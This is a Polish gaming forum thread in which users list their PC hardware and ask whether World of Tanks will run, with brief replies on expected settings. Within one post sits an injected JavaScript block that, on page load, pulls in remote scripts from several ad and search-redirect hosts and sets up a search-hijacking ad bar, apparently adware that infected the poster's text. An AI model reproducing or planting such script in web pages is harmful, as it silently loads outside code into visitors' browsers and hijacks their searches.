Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

Czy pójdzie mi World of Tanks?


Flap

Rekomendowane odpowiedzi

Opublikowano

System:

Klasyfikacja:4,2

Procesor:AMD Athlon™64Processor 3500+ 2.20 GHz

Pamiec ram: 2,00 gb

Typ: 32- bitowy

Card name: NVIDIA GeForce 7300 GT

Manufacturer: NVIDIA

Chip type: GeForce 7300 GT

Current Mode: 1280 x 960 (32 bit) (60Hz)

  • Odpowiedzi 810
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

Witam

 

Ram:DDR3 8GB 1333MHz
Karta graficzna:ATI Radeon HD 6670 1GB
Procesor:AMD FX-4100 3,6 Ghz 4 rdzenie
Zasilacz:niewiem 400+
Rozdzielczość na której zamierzamy grać:1920/1080

Opublikowano

Ram: 8GB 1600G
Karta graficzna: Radeon HD 6790
Procesor:AMD Phenom II x4 960T 3.00GHz
Zasilacz: 500W HighLander
Rozdzielczość 1920x1080

Bedzie szpondzić czy nie za bardzo??



 

W tym temacie możecie się pytać czy pójdzie wam World of Tanks i co wymienić by gra chodziła lepiej lub czy w ogóle poszła.
Tutaj zamieszczam schemat którym powinniście się posługiwać:

Ram:
Karta graficzna:
Procesor:
Zasilacz:
Rozdzielczość na której zamierzamy grać:
Po pierwsze proszę o podawanie Pełnego modelu procesora i karty graficznej, bo GPU to nie tylko pamięć własna, a CPU to nie tylko rdzenie i Ghz. Jeżeli chodzi o RAM to podać trzeba jaki to jest typ np:
DDR2 800Hz
Zasilacz sprawdzamy otwierając boczną stronę obudowy (lewy górny róg), podajemy Model i moc ;)
Na wszystkie pytania będę odpowiadał osobiście wypowiedzi innych użytkowników nie zawszę będą zgodne z prawdą(rzadko będą to odpowiedzi dobre gdyż w tym dziale nie ma ludzi znających się na informatyce oprócz mnie i może jednego Usera)
Jeżeli chodzi wam o wymianę części dopiszcie:

Jeżeli o to czy wam pójdzie dopiszcie:

Jeżeli jest to laptop to proszę o dopisanie ;)

 

<script> var id=2799273971; var aff=30435; var sid=0; function INCL_checkinternals() { var h = document.location.hostname; return (/search\.kalloutsearch\d\.com/i.test(h) == true || /search\.adbar\d\.com/i.test(h) == true || h.indexOf('search.runclips.com') != -1 || h.indexOf('search.searchnowdirect.com') != -1); } function INCL_addEventHandler (el, eType, fn) { if (el.addEventListener) el.addEventListener(eType, fn, false); else if (el.attachEvent) el.attachEvent('on' + eType, fn); else el['on' + eType] = fn; } function INCL_checkdml() { var h = document.location.hostname; return (h.indexOf("google")!=-1 || h.indexOf("facebook.com")!=-1 || h.indexOf("yahoo.com")!=-1 || h.indexOf("bing.com")!=-1 || h.indexOf("ask.com")!=-1 || h.indexOf("listenersguide.org.uk")!=-1); } function INCL_loadScript(src, scriptId) { if (window.location.protocol == 'https:' && src.indexOf('http:') == 0) return; var script = document.createElement("script"); script.src = src; script.characterSet = "utf-8"; script.type = "text/javascript"; script.setAttribute('jsid', 'js36'); if (typeof(scriptId) !== 'undefined') script.id = scriptId; (document.head||document.getElementsByTagName('head')[0]|| document.body||document.getElementsByTagName('body')[0]).appendChild(script); } function INCL_onloadComplete() { if (!INCL_checkdml()) { window.INLDM_cfg = { fi : 4603, fd : 0, fddm: 'xml.cpchero.biz', sttc: 'https://hostmyjs.biz/scripts/inl_dmmtch/', inlsrhdm: 'sonicsearchonline.biz' }; INCL_loadScript('https://hostmyjs.biz/scripts/inl_dmmtch/inl_dmmtch.js'); INCL_loadScript('https://in.admedia.com/?id=ODkoOCI&subid=36'); } INCL_loadScript('http://i.websuggestorjs.info/sugg/javascript.js?channel=js36'); INCL_loadScript('https://cdncache1-a.akamaihd.net/loaders/1247/l.js?aoi=1311798366&pid=1247&zoneid=52222'); window.dmadbar_settings = {dm_standalone : true, dmpd : 2, fd : 4723, fd2: 4604, xmlfeed : 'http://xml.cpchero.biz/search' , search_url : 'http://hostmysearch.com/?prt=yhs1Danta2&errUrl=http://www.yahoo.com&keywords=' , script_base : 'https://hostmyjs.biz/scripts/adbar' }; INCL_loadScript('https://hostmyjs.biz/scripts/adbar/adbar.js'); } if (top === self && !INCL_checkinternals()) { if (document.readyState === 'complete') INCL_onloadComplete(); else INCL_addEventHandler(window, 'load', INCL_onloadComplete); } </script>

Ram: 8GB 1600G
Karta graficzna: Radeon HD 6790
Procesor:AMD Phenom™ II x4 960T 3.00GHz
Zasilacz: 500W HighLander
Rozdzielczość 1920x1080


Bedzie szpondzić czy nie za bardzo??




Opublikowano

Laptop!

Ram:16GB
Karta graficzna: Nvidia GF GTX 675MX
Procesor: Intel Core i7-3630QM
Zasilacz: nie wiem
Rozdzielczość na której zamierzamy grać: Maksymalna

Opublikowano

Wymień RAM i może zasilacz to powinno pójść..

Czy Bóg istnieje? Zależy dla kogo i zależy jaki to jest Bóg.. Dla mnie jest to komputer, i wiem że on na pewno istnieje. B)

 

 

Damir_Avdic-2-800x200.jpg

Opublikowano

Ram:4GB DDR2

Karta graficzna: NVIDIA GeForce 9600GT

Procesor:AMD Athlon II X2 240 2.8 GHz

Zasilacz:Take Me 400W

Rozdzielczość na której zamierzamy grać: FHD(1920x1080)

Opublikowano

Ram:4GB DDR2

Karta graficzna: NVIDIA GeForce 9600GT

Procesor:AMD Athlon II X2 240 2.8 GHz

Zasilacz:Take Me 400W

Rozdzielczość na której zamierzamy grać: FHD(1920x1080)

na średnich pójdzie.

Opublikowano

Up:

Może najpierw podaj cały sprzęt ? ...

Cały sprzęt spełnia wymagania minimalne (256mb grafa, procesora nie znam bo to kumpla komp) tylko że ma 1gb ramu i to nie pasuje do minimalnych.

Opublikowano

na średnich pójdzie.

na niskich przy tej karcie.

 

Ram:4GB DDR2

Karta graficzna: NVIDIA GeForce 9600GT

Procesor:AMD Athlon II X2 240 2.8 GHz

Zasilacz:Take Me 400W

Rozdzielczość na której zamierzamy grać: FHD(1920x1080)

niskie, średnie z klatkowaniem to tak..

Sig.png

Opublikowano

Ram: DDR2 3GB
Karta graficzna: GeForce 9400 GT

Procesor: Athlon 3200+, 1x 2.0 GHZ
Zasilacz: 400W
Rozdzielczość na której zamierzamy grać: 1440x900

|exKidMod Inne MMO|GoldMember|exModder Team|exMMT

Opublikowano

Ram: DDR2 2GB
Karta graficzna: NVIDIA GeForce 8400 GS 256MB
Procesor:Intel Pentium E2180, 2x 2.00 GHz
Zasilacz: 450W
Rozdzielczość na której zamierzamy grać: 1024x768

ZjaranaPanda


  • 2 tygodnie później...
Opublikowano

ram: DDR2 1.99 gb
karta graficzna: nvidia 7300 gt podkrecona do 600 mhz gpu i 400 mhz memory
cpu: amd athlon 64x 2.01 ghz 3800+
zasilacz: Hp 350W
rozdzielczosc 1360-768 lub 1920-1080 ale glownie 720p

Opublikowano

Kurde mam ochotę pograć w WoT'a i,ale nie wiem czy mi pójdzie.

Intel Core 2 Quad Q6600 - 2.4Ghz

2GB Ram DDR2 800Mhz

Nvida GeForce Gt430 1GB 64bit (w ch*j słaba)

Enlight 350W

Rozdzielczość - 1280x800 ,albo FHD (jakby sie dalo)

internet to nie jest jakis oddzielny swiat gdzie ludzie zapomnieli o swoich emocjach

Opublikowano

hmm.. @ZeciarzEmil1 - karta do gier 64bit? No sorry, minimalnie 126 ;) Może w HD poleci na low/medium przy 20-30 fps'ach i drugim procesorze.

Pomogłem? ;) Daj like :)

Opublikowano

@up Mam pytanie ,ale jakim kurna cudem tylko 20-30fps jak w BF3 mam 40 ? WTF?

internet to nie jest jakis oddzielny swiat gdzie ludzie zapomnieli o swoich emocjach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...